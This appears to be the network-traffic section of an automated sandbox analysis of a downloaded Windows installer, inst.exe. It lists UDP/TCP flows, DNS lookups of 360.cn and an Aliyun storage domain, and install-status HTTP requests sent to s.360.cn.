Dec 29, 2024 11:18:32.213413000 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.448812962 CET	18434	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.448848963 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.448848963 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.651359081 CET	3478	18434	1.192.136.170	192.168.2.7
Dec 29, 2024 11:18:32.651408911 CET	3478	18434	1.192.136.170	192.168.2.7
Dec 29, 2024 11:18:32.651438951 CET	3478	18434	1.192.136.170	192.168.2.7
Dec 29, 2024 11:18:32.651473999 CET	3478	18434	1.192.136.170	192.168.2.7
Dec 29, 2024 11:18:32.668854952 CET	18434	3478	192.168.2.7	1.192.136.171
Dec 29, 2024 11:18:32.669101000 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.669128895 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.669162989 CET	18434	33500	192.168.2.7	8.46.123.189
Dec 29, 2024 11:18:32.787817001 CET	3478	18434	1.192.136.170	192.168.2.7
Dec 29, 2024 11:18:32.886363029 CET	18434	3478	192.168.2.7	1.192.136.171
Dec 29, 2024 11:18:32.886388063 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.886394978 CET	18434	33500	192.168.2.7	8.46.123.189
Dec 29, 2024 11:18:32.886388063 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.021941900 CET	3478	18434	1.192.136.170	192.168.2.7
Dec 29, 2024 11:18:33.105129004 CET	18434	3478	192.168.2.7	1.192.136.171
Dec 29, 2024 11:18:33.105142117 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.105169058 CET	18434	33500	192.168.2.7	8.46.123.189
Dec 29, 2024 11:18:33.105175972 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.324851036 CET	18434	3478	192.168.2.7	1.192.136.171
Dec 29, 2024 11:18:33.324882984 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.324907064 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.324943066 CET	18434	33500	192.168.2.7	8.46.123.189
Dec 29, 2024 11:18:33.543071032 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.543071032 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.543104887 CET	18434	3478	192.168.2.7	1.192.136.171
Dec 29, 2024 11:18:33.543104887 CET	18434	33500	192.168.2.7	8.46.123.189
Dec 29, 2024 11:18:33.771950960 CET	18434	3478	192.168.2.7	1.192.136.171
Dec 29, 2024 11:18:33.771996021 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.772032022 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.772049904 CET	18434	33500	192.168.2.7	8.46.123.189
Dec 29, 2024 11:18:33.982098103 CET	18434	3478	192.168.2.7	1.192.136.171
Dec 29, 2024 11:18:33.982326984 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.982351065 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:33.982371092 CET	18434	33500	192.168.2.7	8.46.123.189
Dec 29, 2024 11:18:34.052949905 CET	3478	18434	1.192.136.171	192.168.2.7
Dec 29, 2024 11:18:34.052964926 CET	3478	18434	1.192.136.171	192.168.2.7
Dec 29, 2024 11:18:34.052983046 CET	3478	18434	1.192.136.171	192.168.2.7
Dec 29, 2024 11:18:34.052994013 CET	3478	18434	1.192.136.171	192.168.2.7
Dec 29, 2024 11:18:34.123660088 CET	3478	18434	1.192.136.171	192.168.2.7
Dec 29, 2024 11:18:34.203797102 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:18:34.308515072 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:18:34.359668970 CET	3478	18434	1.192.136.171	192.168.2.7
Dec 29, 2024 11:18:34.461070061 CET	55900	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:34.464617014 CET	64563	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:34.567869902 CET	3478	18434	1.192.136.171	192.168.2.7
Dec 29, 2024 11:18:34.800470114 CET	80	10007	1.192.136.135	192.168.2.7
Dec 29, 2024 11:18:34.904946089 CET	80	10007	1.192.136.135	192.168.2.7
Dec 29, 2024 11:18:35.073961020 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:18:35.147690058 CET	53	55900	1.1.1.1	192.168.2.7
Dec 29, 2024 11:18:35.464500904 CET	64563	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:35.671084881 CET	80	10007	1.192.136.135	192.168.2.7
Dec 29, 2024 11:18:35.874721050 CET	53	64563	1.1.1.1	192.168.2.7
Dec 29, 2024 11:18:35.874813080 CET	53	64563	1.1.1.1	192.168.2.7
Dec 29, 2024 11:19:14.340075970 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:29.761552095 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:33.917881966 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:34.136733055 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:34.355468988 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:34.574125051 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:34.733311892 CET	80	10007	1.192.136.135	192.168.2.7
Dec 29, 2024 11:19:34.947961092 CET	80	10007	1.192.136.135	192.168.2.7
Dec 29, 2024 11:19:35.574991941 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:36.217633963 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:36.433448076 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:36.543011904 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:36.543041945 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:36.652201891 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:36.652430058 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:36.761574984 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:36.761662960 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:36.871150970 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:36.871237993 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:36.981853962 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:36.981897116 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:37.089606047 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:37.089637995 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:37.199052095 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:37.199081898 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:37.308470964 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:37.308507919 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:37.417793036 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:37.417844057 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:37.527257919 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:37.527261972 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:37.638695955 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:37.638984919 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:37.745913982 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:37.746198893 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:37.855292082 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:37.855396986 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:37.964695930 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:37.964931011 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:38.074027061 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:38.074101925 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:38.183363914 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:38.183475971 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:38.184020042 CET	80	10007	1.192.136.134	192.168.2.7
Dec 29, 2024 11:19:38.293622017 CET	80	10007	1.192.136.134	192.168.2.7
Dec 29, 2024 11:19:38.298804045 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:38.298821926 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:38.402055979 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:38.402235985 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:38.402440071 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:38.405172110 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:38.511539936 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:38.511576891 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:38.520725012 CET	80	10007	1.192.136.132	192.168.2.7
Dec 29, 2024 11:19:38.621062994 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:38.621490002 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:38.630103111 CET	80	10007	1.192.136.132	192.168.2.7
Dec 29, 2024 11:19:38.651401043 CET	80	10007	1.192.136.134	192.168.2.7
Dec 29, 2024 11:19:38.729078054 CET	80	10007	1.192.136.134	192.168.2.7
Dec 29, 2024 11:19:38.729520082 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:38.730498075 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:38.730537891 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:38.839631081 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:38.839826107 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:38.845509052 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:38.948970079 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:38.949157000 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:39.058763981 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:39.059039116 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:39.061594009 CET	80	10007	1.192.136.134	192.168.2.7
Dec 29, 2024 11:19:39.070789099 CET	80	10007	1.192.136.132	192.168.2.7
Dec 29, 2024 11:19:39.167797089 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:39.167824984 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:39.171282053 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:39.277153969 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:39.277187109 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:39.296783924 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:39.386480093 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:39.386609077 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:39.395955086 CET	80	10007	1.192.136.132	192.168.2.7
Dec 29, 2024 11:19:39.495898962 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:39.496084929 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:39.504795074 CET	80	10007	1.192.136.132	192.168.2.7
Dec 29, 2024 11:19:39.605243921 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:39.605412006 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:39.608352900 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:39.714673042 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:39.714812040 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:39.719851017 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:39.824254990 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:39.824400902 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:39.934007883 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:39.934111118 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:40.042800903 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:40.043741941 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:40.152168036 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:40.152203083 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:40.154107094 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:40.261600971 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:40.261771917 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:40.375332117 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:40.375364065 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:40.480479956 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:40.480568886 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:40.487179041 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:40.590089083 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:40.590496063 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:40.596554041 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:40.699251890 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:40.699251890 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:40.702655077 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:40.809636116 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:40.809648991 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:40.922061920 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:40.922091961 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:41.027961969 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:41.027990103 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:41.030725956 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:41.136550903 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:41.136580944 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:41.145785093 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:41.245975971 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:41.246098995 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:41.355298996 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:41.355355024 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:41.464693069 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:41.464756012 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:41.471653938 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:41.574318886 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:41.574383020 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:41.575938940 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:41.683482885 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:41.683710098 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:41.792989969 CET	10007	80	192.168.2.7	1.192.136.134
Dec 29, 2024 11:19:41.793147087 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:41.901061058 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:41.902097940 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:42.011533976 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:42.011678934 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:42.013633966 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:42.120944977 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:42.345302105 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:42.454354048 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:42.560606956 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:44.199219942 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:47.919869900 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:48.472918034 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:48.576180935 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:48.576211929 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:51.746021986 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:19:53.825903893 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:55.902479887 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:19:56.453928947 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:19:56.575623989 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:56.575747967 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:19:56.782715082 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:20:00.277561903 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:20:03.011677027 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:20:06.626457930 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:20:10.344070911 CET	10007	80	192.168.2.7	1.192.136.132
Dec 29, 2024 11:20:12.418998957 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:20:16.574600935 CET	10007	80	192.168.2.7	1.192.136.133
Dec 29, 2024 11:20:17.123100996 CET	80	10007	1.192.136.133	192.168.2.7
Dec 29, 2024 11:20:17.231530905 CET	10007	80	192.168.2.7	1.192.136.132

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 29, 2024 11:18:34.359725952 CET	192.168.2.7	1.192.136.171	4a69	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 11:18:14.794842958 CET	192.168.2.7	1.1.1.1	0xd33f	Standard query (0)	bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.285932064 CET	192.168.2.7	1.1.1.1	0x60a3	Standard query (0)	s.360.cn	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.708944082 CET	192.168.2.7	1.1.1.1	0xa3e3	Standard query (0)	st.p.360.cn	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.823026896 CET	192.168.2.7	1.1.1.1	0x12d1	Standard query (0)	tr.p.360.cn	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.825977087 CET	192.168.2.7	1.1.1.1	0x9c05	Standard query (0)	agt.p.360.cn	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:34.461070061 CET	192.168.2.7	1.1.1.1	0xf8de	Standard query (0)	agd.p.360.cn	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:34.464617014 CET	192.168.2.7	1.1.1.1	0x6c13	Standard query (0)	pinst.360.cn	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.464500904 CET	192.168.2.7	1.1.1.1	0x6c13	Standard query (0)	pinst.360.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 11:18:15.085813046 CET	1.1.1.1	192.168.2.7	0xd33f	No error (0)	bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com		47.79.48.211	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.423779011 CET	1.1.1.1	192.168.2.7	0x60a3	No error (0)	s.360.cn		171.8.167.90	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.423779011 CET	1.1.1.1	192.168.2.7	0x60a3	No error (0)	s.360.cn		171.13.14.66	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.423779011 CET	1.1.1.1	192.168.2.7	0x60a3	No error (0)	s.360.cn		180.163.251.230	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.423779011 CET	1.1.1.1	192.168.2.7	0x60a3	No error (0)	s.360.cn		171.8.167.89	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.960895061 CET	1.1.1.1	192.168.2.7	0x12d1	No error (0)	tr.p.360.cn		1.192.136.134	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.960895061 CET	1.1.1.1	192.168.2.7	0x12d1	No error (0)	tr.p.360.cn		1.192.136.133	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.960895061 CET	1.1.1.1	192.168.2.7	0x12d1	No error (0)	tr.p.360.cn		1.192.136.135	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.960895061 CET	1.1.1.1	192.168.2.7	0x12d1	No error (0)	tr.p.360.cn		1.192.136.132	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.964226961 CET	1.1.1.1	192.168.2.7	0x9c05	No error (0)	agt.p.360.cn		1.192.136.133	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:30.964226961 CET	1.1.1.1	192.168.2.7	0x9c05	No error (0)	agt.p.360.cn		1.192.136.132	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:31.252985954 CET	1.1.1.1	192.168.2.7	0xa3e3	No error (0)	st.p.360.cn		1.192.136.170	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.147690058 CET	1.1.1.1	192.168.2.7	0xf8de	No error (0)	agd.p.360.cn	agd2.p.360.cn		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 11:18:35.147690058 CET	1.1.1.1	192.168.2.7	0xf8de	No error (0)	agd2.p.360.cn		1.192.194.215	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.147690058 CET	1.1.1.1	192.168.2.7	0xf8de	No error (0)	agd2.p.360.cn		1.192.194.232	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874721050 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	pinst.360.cn	softm.update.360safe.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874721050 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	softm.update.360safe.com	seupdate.360qhcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874721050 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	seupdate.360qhcdn.com		39.156.85.200	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874721050 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	seupdate.360qhcdn.com		39.156.85.201	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874721050 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	seupdate.360qhcdn.com		39.156.85.231	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874813080 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	pinst.360.cn	softm.update.360safe.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874813080 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	softm.update.360safe.com	seupdate.360qhcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874813080 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	seupdate.360qhcdn.com		39.156.85.200	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874813080 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	seupdate.360qhcdn.com		39.156.85.201	A (IP address)	IN (0x0001)	false
Dec 29, 2024 11:18:35.874813080 CET	1.1.1.1	192.168.2.7	0x6c13	No error (0)	seupdate.360qhcdn.com		39.156.85.231	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com

s.360.cn

pinst.360.cn

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49738	171.8.167.90	80	1464	C:\Users\user\Downloads\inst.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 11:18:30.603414059 CET	398	OUT	GET /safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:32.175178051 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:31 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:33.320899010 CET	428	OUT	GET /safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:33.886421919 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:33 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:33.888859034 CET	385	OUT	GET /safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:34.440874100 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:34 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:34.443403006 CET	398	OUT	GET /safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:35.006236076 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:34 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
